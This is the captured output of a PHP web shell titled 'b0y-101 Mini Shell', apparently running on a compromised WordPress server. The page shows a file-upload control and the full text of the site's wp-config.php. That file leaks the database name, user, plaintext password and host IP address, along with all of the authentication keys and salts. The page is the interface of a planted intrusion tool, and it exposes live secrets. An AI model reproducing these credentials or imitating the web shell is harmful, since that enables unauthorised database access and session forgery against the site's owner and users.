b0y-101 Mini Shell


Current Path : E:/www/raff/
File Upload :
Current File : E:/www/raff/wp-config.php

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'raff' );

/** Database username */
define( 'DB_USER', 'raff' );

/** Database password */
define( 'DB_PASSWORD', 'R@FFhp78' );

/** Database hostname */
define( 'DB_HOST', '202.41.160.56' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'uoAy>bqUlQn3B?Ir1HqQNM,)-:W20T|iD,X^}&kUjI}6pW^W..b(+$d(E#JQ_!4)' );
define( 'SECURE_AUTH_KEY',  's)`j(Nj2Ih.$-u3C3D,G.4-`5;+hUG5ps7SrH_Mh9!Od:bkd0}2.|M{%=(mQLV#!' );
define( 'LOGGED_IN_KEY',    'sAB`2p0DZ%n+u4<T/(h_<y +o5PmV7wv-hc-wh.@7SPp|;S4]J1H)C:FyS;@$KEI' );
define( 'NONCE_KEY',        'tr&7(9?fc=_Tlq)91)~6TE$<|7byaSGjFAKT(O}aEqBz/dT2^x#PjZqgMGPhKJ9D' );
define( 'AUTH_SALT',        ':8B0tx`;XSM{5,aT$WnP|GWH@d/g68g{EBu7hqVk^Lyj@.Ro(fJqXxc{2,-P8D65' );
define( 'SECURE_AUTH_SALT', 'p9RR-LqJ$?i#cPWU.tVO8h8nFv!6~J^<`>[WfvjK|zO&ZZXXPFv;G-qGZlm%<m&_' );
define( 'LOGGED_IN_SALT',   '0GBO,vVkKfEmY%:M3>r98]*TJ9~O8PJ?ij~?jUu+lL,|qsxA*D*S/mj!2S?5$BwB' );
define( 'NONCE_SALT',       'rFQ(_Ivl$Oe0/rs|E*<6^-;K%(R2o.%2/~e 33 +z^ i!fyFD1~;Z_xEh+O0+I#)' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

Copyright © 2019 by b0y-101